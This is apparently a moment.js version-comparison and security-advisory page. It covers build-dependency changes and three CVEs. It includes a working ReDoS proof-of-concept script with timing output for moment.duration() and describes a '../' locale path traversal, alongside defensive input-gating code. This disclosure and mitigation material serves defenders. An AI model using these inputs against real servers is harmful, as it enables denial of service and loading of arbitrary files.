Moment.js saw a minor version bump from 2.8.4 to 2.9.0, an incremental update to this widely-used JavaScript date manipulation library. Both versions share the core functionality of parsing, validating, manipulating, and displaying dates, which is what makes the library a staple for date and time handling in web applications. Key project metadata such as the GitHub repository, author (Iskren Ivov Chernev), and distribution method (tarball via the npm registry) remains consistent across both releases.
Examining the development dependencies reveals subtle differences. Most dependencies are retained, many of them declared as "latest" rather than pinned. Two are new in 2.9.0: grunt-exec and grunt-nuget. grunt-jscs moves in the other direction: 2.8.4 pinned it to version 0.7.1, while 2.9.0 declares it without a fixed version. This suggests changes to the build process, such as code style checks (grunt-jscs), execution of shell commands from the build (grunt-exec), and possibly NuGet package integration (grunt-nuget), although confirming what each task does would require reading the Gruntfile. Two caveats apply before treating the newer release as the better-maintained choice: build-tool changes do not alter the library code that ships to consumers, and unpinned "latest" specifiers make the build non-reproducible, since a fresh install resolves whatever version is current at install time. More importantly, 2.9.0 is still affected by every advisory listed below, which are fixed in 2.11.2, 2.19.3 and 2.29.2 respectively, so an upgrade made for security reasons should target at least 2.29.2. The release dates indicate several weeks of development, and presumably bug fixes, between the two versions.
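The pinning point above is easy to check mechanically. The following is an added example, not code from the page or from the moment project: it flags devDependencies that are not pinned to one exact version and diffs two manifests. The two manifests are constructed from the facts stated in the comparison (grunt-jscs pinned to 0.7.1 in 2.8.4 and unpinned in 2.9.0; grunt-exec and grunt-nuget new in 2.9.0); they are not the real package.json files, and the remaining entries are placeholders.

```javascript
// Added example (not from the page or the moment project). Audits a package
// manifest for devDependencies that are not exact pins and diffs two manifests.
// Both manifests are CONSTRUCTED from the comparison text; only the grunt-jscs,
// grunt-exec and grunt-nuget entries reflect stated facts, the rest are placeholders.
const MANIFEST_2_8_4 = {
  name: 'moment',
  version: '2.8.4',
  devDependencies: {
    grunt: 'latest',
    'grunt-jscs': '0.7.1',
    'grunt-contrib-jshint': 'latest',
  },
};

const MANIFEST_2_9_0 = {
  name: 'moment',
  version: '2.9.0',
  devDependencies: {
    grunt: 'latest',
    'grunt-jscs': 'latest',
    'grunt-contrib-jshint': 'latest',
    'grunt-exec': 'latest',
    'grunt-nuget': 'latest',
  },
};

// Only a bare semver version (optionally "=" or "v" prefixed) resolves to the
// same artifact on every install. Dist-tags ("latest"), ranges ("^1.2.3", ">=1"),
// wildcards and git/URL specifiers resolve to whatever is current at install time.
const EXACT_PIN = /^=?v?\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/;

function isExactPin(spec) {
  return typeof spec === 'string' && EXACT_PIN.test(spec.trim());
}

// Returns [{ name, spec }] for every entry in `field` that is not an exact pin.
function findUnpinned(manifest, field = 'devDependencies') {
  return Object.entries(manifest[field] || {})
    .filter(([, spec]) => !isExactPin(spec))
    .map(([name, spec]) => ({ name, spec }))
    .sort((a, b) => a.name.localeCompare(b.name));
}

// Compares one dependency field between two manifests.
function diffDependencies(older, newer, field = 'devDependencies') {
  const a = older[field] || {};
  const b = newer[field] || {};
  const added = Object.keys(b).filter((k) => !(k in a)).sort();
  const removed = Object.keys(a).filter((k) => !(k in b)).sort();
  const changed = Object.keys(b)
    .filter((k) => k in a && a[k] !== b[k])
    .map((k) => ({ name: k, from: a[k], to: b[k] }))
    .sort((x, y) => x.name.localeCompare(y.name));
  return { added, removed, changed };
}

// Names whose specifier went from an exact pin to something floating; a CI job
// comparing two manifests can fail on a non-empty result.
function pinRegressions(older, newer, field = 'devDependencies') {
  return diffDependencies(older, newer, field).changed
    .filter((c) => isExactPin(c.from) && !isExactPin(c.to))
    .map((c) => c.name);
}

console.log('unpinned in 2.9.0:', findUnpinned(MANIFEST_2_9_0).map((d) => d.name).join(', '));
console.log('diff:', JSON.stringify(diffDependencies(MANIFEST_2_8_4, MANIFEST_2_9_0)));
console.log('pins lost:', pinRegressions(MANIFEST_2_8_4, MANIFEST_2_9_0));
```

On the constructed manifests the audit reports grunt-jscs as the one pin lost between the two releases and grunt-exec and grunt-nuget as additions; run against the real files it would show the actual specifier set. Note that a lockfile, not the manifest, is what makes an install reproducible in practice, and this check is the complement to committing one.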
Known vulnerabilities affecting version 2.9.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability (CVE-2016-4055). The vulnerability is triggered when arbitrary user input is passed into moment.duration(): the string is matched against a backtracking regular expression, and the time spent rejecting an input that is not a valid duration grows roughly with the square of its length. In the proof of concept below, doubling the length from about 20,000 to about 40,000 characters quadruples the time from 0.6 s to 2.4 s.
var moment = require('moment');

// NOTE: `i` is deliberately a single shared variable. The original proof of
// concept used it as an implicit global in both loops; genstr() leaves it at
// len + 1, so each outer iteration advances by 10001 rather than 10000. That is
// why the recorded COUNT values below read 20000, 30001, 40002, ...
var i;

// Build a string of len + 1 copies of chr (the loop bound is inclusive).
var genstr = function (len, chr) {
    var result = "";
    for (i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// Hand moment.duration() a leading '-' followed by a long run of digits and
// time each call. The input is never a valid duration, yet the cost of
// rejecting it grows with the square of its length. The 10,000,000 upper bound
// is the original script's; interrupt the loop once the trend is clear.
for (i = 20000; i <= 10000000; i = i + 10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1');
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str);
    var end = process.hrtime(start);
    console.log(end); // [seconds, nanoseconds] spent inside moment.duration()
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment, those prior to 2.19.3, are vulnerable to a low severity regular expression denial of service when parsing dates as strings (CVE-2017-18214). The root cause is the same as above: attacker-controlled strings of unbounded length are handed to parsing code built on backtracking regular expressions, so the mitigation is the same as well, a length cap and a format check before the string reaches moment.
Update to version 2.19.3 or later.
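Both ReDoS advisories above come down to one mechanism and one fix on the caller's side. The following is an added example, not code from the page or from moment: it reproduces the super-linear rejection cost with an unanchored pattern, contrasts it with an anchored, bounded one, and shows the gate to put in front of moment.duration(). UNSAFE_RE is a reconstruction of the shape of the unanchored "hh:mm:ss"-style pattern involved before 2.11.2 and is an assumption, not moment's source; SAFE_RE and ISO_DURATION_RE, MAX_DURATION_INPUT and the helper names are mine. The hostile input is the same '-' followed by a run of '1' characters that the proof of concept uses.

```javascript
// Added example (not from the page or from moment). UNSAFE_RE approximates the
// shape of the vulnerable duration pattern (assumption); SAFE_RE is the same
// grammar anchored and bounded; the gate functions are what a caller adds.
const UNSAFE_RE = /(-)?(?:(\d*)\.)?(\d+):(\d+)(?::(\d+)\.?(\d{3})?)?/;
const SAFE_RE = /^(-)?(?:(\d{1,9})\.)?(\d{1,2}):(\d{1,2})(?::(\d{1,2})(?:\.(\d{1,3}))?)?$/;

// ISO-8601 duration ("P1DT2H3M4.5S"), also anchored with bounded quantifiers.
const ISO_DURATION_RE = /^-?P(?:\d{1,9}Y)?(?:\d{1,9}M)?(?:\d{1,9}W)?(?:\d{1,9}D)?(?:T(?:\d{1,9}H)?(?:\d{1,9}M)?(?:\d{1,9}(?:[.,]\d{1,9})?S)?)?$/;

// Longest duration string a legitimate client has a reason to send (assumed).
const MAX_DURATION_INPUT = 64;

// Same construction as the proof of concept: '-' then n digits.
function makeHostileInput(n) {
  return '-' + '1'.repeat(n);
}

// Milliseconds the engine needs to reject makeHostileInput(n) against re.
function measureMs(re, n) {
  const input = makeHostileInput(n);
  const t0 = process.hrtime.bigint();
  re.test(input);
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

// Length cap first, then an allow-list of the two duration grammars.
function isSafeDurationInput(s) {
  if (typeof s !== 'string' || s.length === 0 || s.length > MAX_DURATION_INPUT) return false;
  if (SAFE_RE.test(s)) return true;
  // "P" alone satisfies the all-optional groups; require at least one digit.
  return ISO_DURATION_RE.test(s) && /\d/.test(s);
}

// Use as moment.duration(durationArgOrThrow(userInput)): an unbounded string
// never reaches the library's parser.
function durationArgOrThrow(s) {
  if (!isSafeDurationInput(s)) throw new RangeError('rejected duration input');
  return s;
}

// Cost growth when the input length doubles: about 4x for the unanchored
// pattern (quadratic, matching the page's measurements), flat for the anchored one.
function growthFactors(n = 4000) {
  return {
    unsafe: measureMs(UNSAFE_RE, 2 * n) / measureMs(UNSAFE_RE, n),
    safe: measureMs(SAFE_RE, 2 * n) / measureMs(SAFE_RE, n),
  };
}

console.log(growthFactors());
```

The unanchored pattern restarts at every position in the string and backtracks across the remainder each time, which is where the quadratic cost comes from; anchoring with ^ and $ and replacing `\d*` and `\d+` with bounded repeats removes both factors. For the second advisory, date-string parsing, the same length cap applies, and the format allow-list is expressed by calling moment with explicit formats in strict mode, `moment(input, formats, true)`, rather than letting it guess the format.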
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. fr, is directly used to switch the moment locale (CVE-2022-24785). In a Node.js process, a locale name that has not been loaded yet is turned into a path under the library's locale directory and loaded with require(), so a name containing traversal segments such as ../ can make the process load an arbitrary JavaScript file from the server's filesystem, which is why the advisory scopes the impact to server-side use.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Workaround: sanitize any user-provided locale name before passing it to moment.js, ideally by accepting only names from the fixed set of locales the application ships.